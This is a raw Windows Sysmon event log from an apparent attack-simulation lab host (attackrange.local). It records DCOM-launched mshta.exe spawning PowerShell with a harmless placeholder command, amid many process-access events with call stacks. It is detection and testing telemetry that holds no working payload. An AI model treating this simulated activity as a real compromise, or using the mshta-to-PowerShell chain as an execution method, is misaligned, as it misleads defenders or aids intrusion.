15:59:29.257{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000025221Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.210{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hwrgpsbs.z4b.ps12021-01-20 15:59:29.210 10341000x800000000000000025220Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.210{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025219Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.163{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5361-6008-5806-00000000A301}4104C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025218Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.163{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5361-6008-5806-00000000A301}4104C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025217Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.163{7901BC46-5361-6008-5806-00000000A301}41047404C:\Windows\system32\conhost.exe{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025216Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.147{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5361-6008-5806-00000000A301}4104C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025215Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.147{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025214Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.147{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025213Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.147{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025212Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.147{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025211Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.147{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025210Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.147{7901BC46-5361-6008-5606-00000000A301}33568164C:\Windows\System32\mshta.exe{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000025209Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.155{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exeC:\Windows\System32\mshta.exe -Embedding 10341000x800000000000000025208Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.116{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025207Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.116{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025206Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.116{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025205Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.116{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025204Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.100{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025203Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.100{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025202Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.100{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025201Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.085{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025200Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.085{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025199Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.085{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025198Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.085{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025197Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.085{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025196Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025195Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000025194Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.084{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEC:\Windows\System32\mshta.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000025193Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535F-6008-5506-00000000A301}3288C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025192Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll